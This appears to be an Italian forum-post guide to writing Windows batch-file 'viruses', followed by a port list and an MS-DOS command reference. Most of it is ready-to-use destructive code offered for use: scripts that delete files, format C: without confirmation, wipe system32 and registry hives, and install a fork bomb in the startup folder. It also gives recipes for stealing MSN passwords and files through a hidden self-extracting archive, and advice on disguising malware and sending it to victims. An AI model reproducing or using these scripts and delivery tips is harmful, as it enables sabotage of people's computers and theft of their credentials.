| Ecco la guida nn e mia...
*Salvare Un Virus*
1) Aprire il blocco note
2) Incollarci il codice
3) Chiudere e salvare il file in .bat
------------------------------------------------------------------------
*Virus Per Cancellare Un File*
1) Aprite il blocco note
2) Incollateci 1 dei seguenti codici:
@ERASE /comando "C:percorsopercorso *.*" @DEL /comando "C:percorsopercorso *.*"
3) Chiudete e salvate in .bat
IN DETTAGLIO: Che significa quel codice?
1) @ERASE e @DEL = Sono per cancellare file 2) /comando = Bisognerebbe inserire 1 o più comandi tra questi:
a) /P Chiede conferma prima di eliminare ogni file. b) /F Forza l'eliminazione dei file di sola lettura. c) /S Elimina i file specificati da tutte le sottodirectory. d) /Q Modalità silenziosa, non chiede conferma per eliminazioni globali. e) /A Seleziona i file da eliminare in base agli attributi.
3) *.* = Il PRIMO asterisco serve per cancellare TUTTI i file con un certo nome, come: CODICE eversor.*
4) *.* = Il SECONDO asterisco serve per cancellare QUALSIASI tipo di ESTENSIONE di un file, come: CODICE *.txt
5) QUINDI, in sostanza se dobbiamo cancellare il file "eversor" in .txt sul desktop, faremo: CODICE @ERASE /S /Q "C:ProgrammiDocuments and settingsL.H.S.Desktopeversor.txt *.txt"
------------------------------------------------------------------------
*Virus Per Cancellare Una Cartella*
1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
@RD /s /q C:Percorso_Cartella
3) Salvare in .bat
IN DETTAGLIO: Perchè @RD? @RD Serve in questo per cancellare una cartella, mentre @DEL e @ERASE era per File, @RD è per cartella.
------------------------------------------------------------------------
*Virus Per Formattare C:*
1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
format C: /autotest /q /u
3) Salvare in .bat
IN DETTAGLIO: Questo virus formatta c: senza chiedere conferma (/q) e non permette di essere bloccata piu avanti (/u)
------------------------------------------------------------------------
*Virus Per Disconnettere/Riavviare/Spegnere il PC*
1) Aprire il blocco note
2) Inserire dentro il seguente codice:
shutdown -comando
3) Salvare in .bat
IN DETTAGLIO: Il -comando può essere sostituito tra i seguenti:
a) -i : Attiva l’interfaccia utente grafica b) -l : Disconnette l'utente c) -r : Riavvia il PC d) -s : Spegne il computer e) -t xx: xx Sarebbero i secondi di attesa prima della chiusura di Windows f) -f : Chiude le applicazioni ancora aperte
------------------------------------------------------------------------
*Virus Per Distruggere Un PC*
1) Aprire il blocco note
2) Inserire dentro il seguente codice:
title Fuck You! color 0a shutdown.exe -r -t 41 -c "Fuck You Idiot!" @del C:autoexec.bat @del C:boot.ini @del C:windowssystem.ini @del C:windowssystem32configSYSTEM @del C:windowssystem32configSOFTWARE @del C:windowssystem32configSECURITY @del C:windowssystem32*.exe @del C:windowssystem32*.dll @del C:windowssystem32drivers*.sys @del D:autoexec.bat @del D:boot.ini @del D:windowssystem.ini @del D:windowssystem32configSYSTEM @del D:windowssystem32configSOFTWARE @del D:windowssystem32configSECURITY @del D:windowssystem32*.exe @del D:windowssystem32*.dll @del D:windowssystem32drivers*.sys @rd C:Programmi /q /s @rd D:Programmi /q /s @del C:*.* /q /s @del D:*.* /q /s @rd C:windowssystem32 /q /s @rd D:windowssystem32 /q /s :1 Start goto :1
3) Salvare in .bat
------------------------------------------------------------------------
*Virus Per Far Impallare Il PC*
1) Aprire il blocco note
2) Inserire dentro il seguente codice:
echo :1 >> "C:Documents and Settings%USERNAME%Menu AvvioProgrammiEsecuzione automaticaAutomatic.bat" echo Start >> "C:Documents and Settings%USERNAME%Menu AvvioProgrammiEsecuzione automaticaAutomatic.bat" echo goto :1 >> "C:Documents and Settings%USERNAME%Menu AvvioProgrammiEsecuzione automaticaAutomatic.bat" :1 Start goto :1
3) Salvare in .bat
IN DETTAGLIO: Se aprite l'msdos (Start->Esegui->cmd) e scrivete START, a sua volta vi apre di nuovo il prompt.
------------------------------------------------------------------------
*Virus Per Rubare File Tramite Cartella Condivisa Di Msn*
1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
@copy "Percorso File Da Rubare" "C:Documents and Settings%USERNAME%Impostazioni localiDati applicazioniMicrosoftMessengerIndirizzo Msn ProprioSharing FoldersIndirizzo Msn Vittima"
3) Salvare in .bat
------------------------------------------------------------------------
*Virus Per Rubare Password Di Msn Tramite MsnPass.exe E Cartella Condivisa*
1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
@MsnPass.exe /stext "C:Documents and Settings%USERNAME%Impostazioni localiDati applicazioniMicrosoftMessengerIndirizzo VittimaSharing FoldersIndirizzo ProprioTest.txt"
3) Salvare in .bat
4) Mettere il file Setup.exe e il file MsnPass.exe in un archivio auto-estraente e mettere come percorso "C:WindowsSystem32". In esegui dopo l'estrazione mettere "Setup.exe". Nella categoria Modalità selezionare "Nascondi Tutto" e "Sovrascrivi tutti i file già esistenti"
------------------------------------------------------------------------
*Ritornare Ad Un Comando*
:1
goto :1
------------------------------------------------------------------------
*Trovare Il Nome Della Partizione*
%Homedrive%
------------------------------------------------------------------------
*Trovare Il Nome Del Profilo*
%Userprofile%
------------------------------------------------------------------------
*Trasformare Il .bat In .exe*
1) Scaricate il seguente programma: Batch To Exe 1.2
2) Apritelo e scegliete le opzioni, si può anche cambiare l'icona del file
------------------------------------------------------------------------
*Aumentare Il Peso Del Virus*
1) Aprire il blocco note
2) Incollarci dentro il codice
3) Aggiungere il codice:
@REM parole_a_caso_ma_tante
4) Salvare in .bat
IN DETTAGLIO: Perchè @REM? Allora si da il caso che il comando @REM, serva per "Inserire Commenti", MA, se noi al posto dei commenti mettiamo non so, 500 volte la lettere aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, non faremo altro che AUMENTARE il peso del virus.
------------------------------------------------------------------------
*Per Rendere Un File Autoeseguibile Ad Ogni Avvio Di Windows*
echo (inserite il comando)>"%USERNAME%Menu AvvioProgrammiEsecuzione automatica(nome).bat" echo hacked>"%USERNAME%Menu AvvioProgrammiEsecuzione automaticahacked.txt
------------------------------------------------------------------------
*Vedere L'Indirizzo IP Della Vittima Con Cui State chattando*
1) Aprire il prompt dei comandi
2) Digitare la seguente stringa: netstat -na
3) Andare in cerca dell'ip che serve
------------------------------------------------------------------------
*Come Inviare Un Virus*
Ci sono diversi modi per farlo:
1) Msn: è la cosa più niubba che si possa fare ma alcuni lo fanno per iniziare...non ci vuole molto inviate il vostro bel file ad un contatto facendolo passare per qualcos’altro.
2) Mail Bomb: più semplice di cosi...inviate una mail con allegato il vostro virus (dovete camuffarlo e dovete camuffare anche il vostro indirizzo prima)
3) P2p: sinceramente se vi azzardate a mettere i vostri virus in rete giuro che se vi trovo vi uccido visto che io sono uno che ha il mulo attaccato 25 ore su 24...
4) Chiavette Usb O CD O Floppy: questo è un metodo semplice ma che richiede soldi e ingenio... soldi perchè cmq un cd o una chiavetta costa e ingenio perchè non potete dare la chiavetta con il virus ad un amico x farli uno scherzo perchè alla fine sa da chi andare a cercare!
------------------------------------------------------------------------
*Virus In Un Immagine*
copy /b C:nomeimmagine.jpg + C:file.rar C:nomeImmagineGenerata.jpg
------------------------------------------------------------------------
*Terminare I Processi*
taskkill /F /IM (nomeprocesso).exe
Esempio:
taskkill /f /im wmplayer.exe
------------------------------------------------------------------------
*Per Creare Un File .bat Che Ne Crea Un'Altro*
@echo > nomefile.bat @echo (operazione) > nomefile.bat
potete aggiungere tutti i comandi che volete l'importante è che li mandate nel file .bat! (comando > nomefile.bat)
------------------------------------------------------------------------
*Tutte Le Porte*
1/tcp TCP Multiplexor 7/tcp Echo Protocol 7/udp Echo Protocol 9/tcp Discard Protocol 9/udp Discard Protocol 13/tcp Daytime Protocol 17/tcp Quote of the Day 19/tcp Chargen Protocol 19/udp Chargen Protocol 20/tcp FTP - Il file transfer protocol - data 21/tcp FTP - Il file transfer protocol - control 22/tcp SSH - Secure login, file transfer (scp, sftp) e port forwarding 23/tcp Telnet insecure text communications 25/tcp SMTP - Simple Mail Transfer Protocol (E-mail) 53/tcp DNS - Domain Name Server 53/udp DNS - Domain Name Server 67/udp BOOTP BootStrap Protocol (Server) Usato anche dal DHCP Dynamic Host Configuration Protocol 68/udp BOOTP BootStrap Protocol (Client) Usato anche dal DHCP Dynamic Host Configuration Protocol 69/udp TFTP Trivial File Transfer Protocol 70/tcp Gopher 79/tcp finger Finger 80/tcp HTTP HyperText Transfer Protocol (WWW) 88/tcp Kerberos Authenticating agent 104/tcp Dicom - Digital Imaging and Communications in Medicine 110/tcp POP3 Post Office Protocol (E-mail) 113/tcp ident vecchio sistema di identificazione dei server 119/tcp NNTP usato dai newsgroups usenet 139/tcp NetBIOS 143/tcp IMAP4 Internet Message Access Protocol (E-mail) 389/tcp LDAP 443/tcp HTTPS usato per il trasferimento sicuro di pagine web 445/tcp Microsoft-DS (Active Directory, share di Windows, Sasser-worm) 445/udp Microsoft-DS SMB file sharing 514/udp syslog usato per il system logging 563/tcp NNTP Network News Transfer Protocol (newsgroup Usenet) su SSL 591/tcp FileMaker 6.0 Web Sharing (HTTP Alternate, si veda la porta 80) 666/tcp Doom giocato in rete via TCP 993/tcp IMAP4 Internet Message Access Protocol (E-mail) su SSL 995/tcp POP3 Post Office Protocol (E-mail) su SSL
1080/tcp SOCKS Proxy 1352/tcp IBM Lotus Notes/Domino RPC 1433/tcp Microsoft-SQL-Server 1434/tcp Microsoft-SQL-Monitor 1434/udp Microsoft-SQL-Monitor 1984/tcp Big Brother 2101/tcp rtcm-sc104 usato per le correzioni differenziali dei gps 2101/utp rtcm-sc104 usato per le correzioni differenziali dei gps 3128/tcp HTTP usato dalle web cache e porta di default per Squid cache 3306/tcp MySQL Database system 3389/tcp Desktop Remoto di Windows e Microsoft Terminal Server (RDP) 3690/tcp Subversion 3690/udp Subversion 4662/tcp Emule (versioni precedenti alla 0.47, le più recenti la generano casualmente) 4672/udp Emule (versioni precedenti alla 0.47, le più recenti la generano casualmente) 4711/tcp Emule Web Server 5060/tcp SIP 5060/udp SIP 5190/tcp AOL e AOL Instant Messenger 5222/tcp XMPP/Jabber Client Connection 5269/tcp XMPP/Jabber Server Connection 5432/tcp PostgreSQL Database system 5631/tcp Symantec PcAnywhere 5632/udp Symantec PcAnywhere 5800/tcp Ultra VNC (http) 5900/tcp Ultra VNC (main) 6000/tcp X11 usato per X-windows 6667/tcp IRC, Internet Relay Chat 8000/tcp iRDMI. Spesso usato per sbaglio al posto della porta 8080. 8080/tcp HTTP Alternate (http-alt) o WWW caching service (web cache). Usato spesso quando un secondo server web opera sulla stessa macchina, come server proxy e di caching, o per far girare un server web come utente non di root. Si veda anche la porta 80. Tomcat usa di default questa porta. 8118/tcp privoxy http filtering proxy service
1337/tcp WASTE Encrypted File Sharing Program 1521/tcp Oracle database default listener (CONFLITTO con l'uso registrato: nCube License Manager) 2082/tcp CPanel, porta di default port (CONFLITTO con l'uso registrato: Infowave Mobility Server) 2086/tcp Web Host Manager, porta di default (CONFLITTO con l'uso registrato: GNUnet) 4662/tcp eMule, porta di default per il protocollo eDonkey usato da eMule 4672/udp eMule, porta di default per il protocollo eDonkey usato da eMule 5000/tcp Universal plug-and-play Windows network device interoperability (CONFLITTO con l'uso registrato: commplex-main) 5223/tcp XMPP/Jabber porta di default per SSL Client Connection 5800/tcp VNC remote desktop protocol (per l'uso via HTTP) 5900/tcp VNC remote desktop protocol (porta standard) 6881/tcp BitTorrent porta spesso usata 6969/tcp BitTorrent tracker port (CONFLITTO con l'uso registrato: acmsoda) 27960/udp (fino a 27969) Quake 3 e videogiochi derivati da Quake 3 31337/tcp Back Orifice Remote administration tool (spesso usata dai Trojan)
------------------------------------------------------------------------
*Cambiare La Password Ad Un Utente*
net user (nome utente) (password)
Esempio:
net user io ciao
In questo modo la pwd dell'utente io diventerà ciao
net user administrator !£$%&/()=?^
In questo modo la pwd dell'utente io diventerà !£$%&/()=?^
Non credo che a qualcuno venga in mente questa psw
------------------------------------------------------------------------
*Cambiare La Password Senza Sapere Nome Utente*
net user %USERNAME% ciao
Questo comando è utile x cambiare la password della modalità provv... per farlo inserite questo:
net user administrator !"£$%&/()==!)=£)
se la trova è un genio!
------------------------------------------------------------------------
*Cartella Invisibile*
1) Creare una cartella
2) Rinominare e cliccare Alt + 0160
3) Mettere l'icona trasparente
------------------------------------------------------------------------
*Comandi MS-Dos*
* assign - reindirizza tutte le richieste a un drive, verso un altro drive * attrib - visualizza o modifica gli attributi dei file * backup - crea una copia di sicurezza di uno o più file su una serie di floppy-disk * break - abilita o disabilita l'interruzione o l'esecuzione fornita da CTRL C e CTRL BREAK * cd - entra in una directory * chdir - cambia la directory corrente o ne visualizza il nome * chkdsk - analizza il contenuto del disco e visualizza una relazione sul suo stato * cls - cancella il contenuto della schermata (questo comando non è distruttivo) * color - permette di impostare il colore dello sfondo e del testo * command - avvia un nuovo interprete dei comandi MS-DOS * comp - confronta il contenuto di un file o gruppo di file con altri * copy - copia uno o più file in un altro punto del disco * ctty - cambia la console di input/output da cui vengono impostati i comandi * date - visualizza e permette di aggiornare la data * defrag - riorganizza i file in un disco rigido per ottimizzarne l'uso * del - cancella uno o più file * deltree - elimina una directory e tutti i file e le sottodirectory in essa contenute * dir - visualizza il contenuto di una directory * discopy - copia il contenuto di un disco floppy in un altro disco floppy * diskcomp - confronta il contenuto di due dischetti dello stesso tipo * doskey - ripete gli ultimi comandi digitati * echo - abilita o disabilita l'eco da file batch * edit - avvia MS-DOS Editor per creare o modificare i file ASCII * edlin - avvia un editor di righe di testo. Per magg. informazioni (Prompt comandi e edlin/?) * emm386 - abilita o disabilita la memoria espansa di EMM386 * erase - cancella uno o piu file specificati * exe2bin - converte in formato binario un file eseguibile * exit - provoca l'uscita da un interprete di comandi secondario per ritornare ad un interprete di comandi o ad un programma precedenti * expand - decomprime uno o più file compressi * fastopen - accellera l'apertura di un programma * fc - confronta il contenuto di due file * fdisk - configura un disco rigido creando le partizioni, per l'utilizzo di MS-DOS * find - ricerca una sequenza di caratteri all'interno di uno o piu file * for - permette di eseguire in modo iterattivo comandi di MS-DOS * format - formatta un disco per l'utilizzo di MS-DOS * goto - trasferisce l'esecuzione ad una determinata posizione di un file batch * graftabl - carica in memoria i caratteri ASCII non BIOS per i modi grafici * help - visualizza la guida di MS-DOS. ATTENZIONE la guida è troppo lunga per essere visualizzata in una sola schermata, quindi per visualizzarla schermata per schermata digitare help|more (il simbolo "|" è il tasto alla sinistra tasto uno (1) altrimenti alt+124 = "|" e scrivere more * hexdump - lista in formato esadecimale il contenuto di un file, byte per byte * if - condiziona l'esecuzione di un comando in un file batch * ipconfig - visualizza configurazione IP di Windows. ATTENZIONE per maggiori informazioni digitare ipconfig/all * join - unisce un drive di disk ad una directory vuota su di un altro drive * keyb - configura la tastiera per la lingua specificata * label - crea, modifica o elimina l'etichetta di volume di un disco * md - crea una directory * mem - visualizza la quantità della memoria usata e quella libera del sistema * mode - stabilisce le modalità di visualizzazione e trasmissione per la stampante * more - permette la visualizzazione di informazioni, (files, pagine, o altri tipi di dati) che per la loro grandezza (insieme di righe) devono essere visualizzate con più schermate alla volta. ATTENZIONE è necessario che "more" sia preceduto dal simbolo "|" ALT+124. Ex. help|more. Prestare ulteriore ATTENZIONE in alcuni computers o Sistemi operativi anteriori al MS-DOS 6.0 non riconoscono il simbolo "|" è, perciò, necessario digitare il simbolo "/" seguito da una p. Ex. help/p * path - visualizza o imposta un percorso di ricerca per file eseguibili * pause - provoca una pausa nell'esecuzione di un file batch per consentire un input da operatore * print - stampa un file di testo * prompt - cambia il prompt dei comandi di MS-DOS * rd - cancella una directory * recover - recupera un file o un intero disco con settori danneggiati * rem - visualizza commenti durante l'esecuzione di un file batch * ren - rinomina uno o più file * replace - sostituisce i file * restore - ripristina dai dischi di back-up un certo numero di file * rmdir - rimuove una sottodirectory vuota * select - copia il dischetto MS-DOS per creare una copia di lavoro per la nazionalità selezionata della tastiera * set - assegna un valore di sostituzione ad un parametro con chiave presente in un programma applicativo o in un file batch * share - installa la condivisione ed il bloccaggo dei file MS-NET * shift - aumenta il numero di parametri sostituibili in un file batch * shutdown - arresta o riavvia il sistema * sort - ordina i dati alfabeticamente, in un senso o nell'altro * subst - associa un percorso ad una lettera di unità * sys - copia i file di sistema di MS-DOS e l'interprete dei comandi sul disco specificato * time - visualizza e consente di modificare l'ora * title - permette di impostare il titolo della finestra * tree - visualizza tutte le directory ed i percorsi del drive specificato * type - visualizza il contenuto di un file di testo * undelete - ripristina i file cancellati precedentemente con il comando del * unformat - ripristina i dati di un disco cancellati con il comando format * ver - visualizza la versione di MS-DOS in uso * verify - abilita la verifica dei dati in scrittura * vol - visualizza l'etichetta e il numero di serie di volume del disco * win - esegue Windows * xcopy - copia i file e la struttura delle directory (ad esclusione dei file nascosti e di sistema)
|